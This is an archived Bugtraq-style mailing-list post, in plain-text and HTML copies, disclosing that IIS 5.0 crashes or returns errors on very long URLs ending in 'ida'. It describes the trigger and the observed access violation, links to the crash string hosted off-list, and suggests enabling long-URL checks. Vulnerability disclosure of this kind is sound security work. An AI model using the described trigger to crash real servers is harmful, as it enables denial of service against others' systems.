This is a multi-part message in MIME format. ------=_NextPart_000_0009_01BF5DF9.36CFEF60 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Description: MS IIS 5.0 has problems handling a specific form of URL ending with = "ida". The extension ida has been taken from the Bugtraq posting "IIS revealing = webdirectories" The problem causes 2 kind of results. The one result is that the server responds with a message like "URL String too long"; "Cannot find the specified path" The other error causes the server to terminate with an Access Violation. When the server "Access violates" it displays as last message: File d:\http\.................................................................= .........................................................................= .........................................................................= .........................................???????. Error 0xc0000005 caught while processing query Reproducing: As described above, the server gives out on one and the same string , 2+ = error messages. The String will be hosted on an external site, so it doesn't produce too = much email traffic for Bugtraq. You find the string at: www.packetshield.de/iisstring.txt (25KB) (Use Netscape Browser to view the file because MS IE5.0 has a bug = preventing viewing txt files in one row what cuts of a large peace of the string. You can still view it with the "View source" of MS IE5.0. = the last 3 bytes of the string are "ida", then the url is complete) As described above there are 2+ kinds of messages: 1)Access Violation with a display on the website you request 2)URL too long 3)Cannot find the specified path (3) output: File = d:\http\.................................................................= .........................................................................= .........................................................................= .........................................????. The system cannot find = the path specified.=20 With the one and the same string you get one of the 3 messages. The Access Violation error comes about every = 20 times you request. (don't ask me why) I have 2 screenshots where 2 of the messages are displayed. The system I have tried it out is a cluster where each backups the other = on case of failure. Because of that reason I can not guaranteed say if the process dies or = not, because I got redirected to another server. The screenshots can be viewed at: http://www.packetshield.de/extra/crash1.jpg www.packetshield.de/extra/crash2.jpg Sorry the shots are so large (79,114KB, but Bitmap Editor can't compress = better :-( ) I hope MS personal can fix that bug quickly because there is a chance of = DoS'ing IIS Webservers, which have disabled "too long URL strings" One Server has too long URL check enabled and gives out a "warning". Temp. Solution: Enable IIS to check for too long URL strings and block them. I hope I didn't describe it to difficult, but I still prefer describing it instead of giving=20 an exploit which can be used by every kid without understanding how it works and just doing damage =20 ------------------------------- Lark Lizerman contact: lizermanat_private or lark82at_private ------------------------------- ------=_NextPart_000_0009_01BF5DF9.36CFEF60 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META content=3D"text/html; charset=3Diso-8859-1" = http-equiv=3DContent-Type> <META content=3D"MSHTML 5.00.2722.2800" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#fffff0> <DIV><FONT face=3DArial size=3D2>Description:</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>MS IIS 5.0 has problems handling a = specific form of=20 URL ending with "ida".</FONT></DIV> <DIV><FONT face=3DArial size=3D2>The extension ida has been taken from = the Bugtraq=20 posting "IIS revealing webdirectories"</FONT></DIV> <DIV><FONT face=3DArial size=3D2>The problem causes 2 kind of = results.</FONT></DIV> <DIV><FONT face=3DArial size=3D2>The one result is that the server = responds with a=20 message like</FONT></DIV> <DIV><FONT face=3DArial size=3D2>"URL String too long"; "Cannot find the = specified=20 path"</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>The other error causes the server to = terminate with=20 an Access Violation.</FONT></DIV> <DIV><FONT face=3DArial size=3D2>When the server "Access violates" = it displays=20 as last message:</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial=20 size=3D2>File<BR>d:\http\................................................= .........................................................................= .........................................................................= ..........................................................???????.<BR>Err= or=20 0xc0000005 caught while processing query</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>Reproducing:</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>As described above, the server gives = out on one and=20 the same string , 2+ error messages.</FONT></DIV> <DIV><FONT face=3DArial size=3D2>The String will be hosted = on an external=20 site, so it doesn't produce too much email traffic for = Bugtraq.</FONT></DIV> <DIV><FONT face=3DArial size=3D2>You find the string at: <A=20 href=3D"http://www.packetshield.de/iisstring.txt">www.packetshield.de/iis= string.txt</A> (25KB)</FONT></DIV> <DIV><FONT face=3DArial size=3D2>(Use Netscape Browser to view the file = because MS=20 IE5.0 has a bug preventing viewing txt files in one row what cuts of a = large=20 peace</FONT></DIV> <DIV><FONT face=3DArial size=3D2>of the string. You can still view it = with the "View=20 source" of MS IE5.0. the last 3 bytes of the string are "ida", then the = url is=20 complete)</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>As described above there are 2+ kinds = of=20 messages:</FONT></DIV> <DIV> </DIV> <DIV>1)Access Violation with a display on the website you = request</DIV> <DIV>2)URL too long</DIV> <DIV>3)Cannot find the specified path</DIV> <DIV> </DIV> <DIV>(3) output:</DIV> <DIV>File=20 d:\http\.................................................................= .........................................................................= .........................................................................= .........................................????.=20 The system cannot find the path specified. </DIV> <DIV> </DIV> <DIV> </DIV> <DIV> </DIV> <DIV>With the one and the same string you</DIV> <DIV>get one of the 3 messages. The Access Violation error comes = about=20 every 20 times you request. (don't ask me why)</DIV> <DIV> </DIV> <DIV>I have 2 screenshots where 2 of the messages are displayed.</DIV> <DIV>The system I have tried it out is a cluster where each backups the = other on=20 case of failure.</DIV> <DIV>Because of that reason I can not guaranteed say if the process dies = or not,=20 because I got redirected to another server.</DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>The screenshots can be viewed = at:</FONT></DIV> <DIV><FONT face=3DArial size=3D2><A=20 href=3D"http://www.packetshield.de/extra/crash1.jpg">http://www.packetshi= eld.de/extra/crash1.jpg</A></FONT></DIV> <DIV><FONT face=3DArial size=3D2><A=20 href=3D"http://www.packetshield.de/extra/crash2.jpg">www.packetshield.de/= extra/crash2.jpg</A></FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Sorry the shots are so large (79,114KB, = but Bitmap=20 Editor can't compress better :-( )</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>I hope MS personal can fix that bug = quickly because=20 there is a chance of DoS'ing IIS Webservers, which have disabled "too=20 long URL strings"</FONT></DIV> <DIV><FONT face=3DArial size=3D2>One Server has too long URL check = enabled and gives=20 out a "warning".</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>Temp. Solution:</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>Enable IIS to check for too long URL=20 strings</FONT> <FONT face=3DArial size=3D2>and block = them.</FONT></DIV> <DIV> </DIV> <DIV> </DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>I hope I didn't describe it to=20 difficult,</FONT></DIV> <DIV><FONT face=3DArial size=3D2>but I still prefer describing it = instead of giving=20 </FONT></DIV> <DIV><FONT face=3DArial size=3D2>an exploit which can be used by every=20 kid</FONT></DIV> <DIV><FONT face=3DArial size=3D2>without understanding how it works and = just doing=20 damage</FONT></DIV> <DIV> </DIV> <DIV> </DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>-------------------------------<BR>Lark = Lizerman<BR>contact:<BR><A=20 href=3D"mailto:lizermanat_private">lizermanat_private</A><BR>or</FONT><= /DIV> <DIV><FONT face=3DArial size=3D2><A=20 href=3D"mailto:lark82at_private">lark82at_private</A></FONT></DIV> <DIV><FONT face=3DArial=20 size=3D2>-------------------------------</FONT></DIV></BODY></HTML> ------=_NextPart_000_0009_01BF5DF9.36CFEF60--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:28:13 PDT